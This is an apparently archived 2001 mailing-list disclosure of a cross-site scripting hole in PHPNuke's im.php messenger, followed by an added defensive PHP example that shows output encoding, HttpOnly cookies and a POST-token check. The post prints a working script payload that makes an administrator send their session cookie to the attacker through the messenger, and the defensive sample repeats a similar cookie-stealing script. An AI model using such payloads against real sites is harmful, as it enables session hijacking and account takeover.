There is a big hole in imessenger (im.php). It accepts JavaScript... if I send

<*s*cript>window.location.href='http://www. [SERVER].com/im.php?username_to= [MY_NICK] &subject='+ document.cookie +'&message=message&action=send' ;</script>

(without the '*') to the admin, he sends his cookie.

PHPNuke has been alerted.

There's a tut (French) here: http://balteam.multimania.com/Tuts/imhole.txt

frog-m@n
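Added example, not part of the original post and not PHPNuke's own code: one way a message viewer can close the hole described above, by encoding every message field on output, keeping the session cookie away from script, and refusing a send that arrives as a plain GET. The helper names (h, render_message, may_send), the 'from' and 'token' fields and the sample values are assumptions made for illustration.

```php
<?php
// Added illustration; not PHPNuke's im.php. All names here are hypothetical.

// Keep the session cookie out of reach of document.cookie.
ini_set('session.cookie_httponly', '1');

// Encode a user-controlled value for use in HTML text or attribute context.
function h(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Render one private message. The array keys are assumed, mirroring the
// username_to / subject / message parameters seen in the post.
function render_message(array $msg): string {
    return "<div class=\"im\">\n"
         . '  <b>From:</b> ' . h($msg['from']) . "<br>\n"
         . '  <b>Subject:</b> ' . h($msg['subject']) . "<br>\n"
         . '  <p>' . nl2br(h($msg['message'])) . "</p>\n"
         . "</div>\n";
}

// Accept a send only as a POST carrying the per-session token, so that a
// navigation to a crafted URL cannot send a message on the reader's behalf.
function may_send(string $method, array $post, string $sessionToken): bool {
    return $method === 'POST'
        && isset($post['token']) && is_string($post['token'])
        && hash_equals($sessionToken, $post['token']);
}

// Constructed sample: a message whose body carries script markup.
$sample = [
    'from'    => 'someuser',
    'subject' => 'hello',
    'message' => "<script>window.location.href='http://example.invalid/?c='"
               . "+document.cookie;</script>",
];

// The markup is emitted as inert text (&lt;script&gt;...), not as an element.
echo render_message($sample);

// A GET with the right token value is still refused; only the POST passes.
var_dump(may_send('GET',  ['token' => 'abc'], 'abc'));
var_dump(may_send('POST', ['token' => 'abc'], 'abc'));
```

Output encoding is the fix for the injection itself; the cookie flag and the POST-plus-token check only limit what an injected script could do if another unescaped field were missed.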
This archive was generated by hypermail 2b30 : Sat Dec 15 2001 - 08:54:36 PST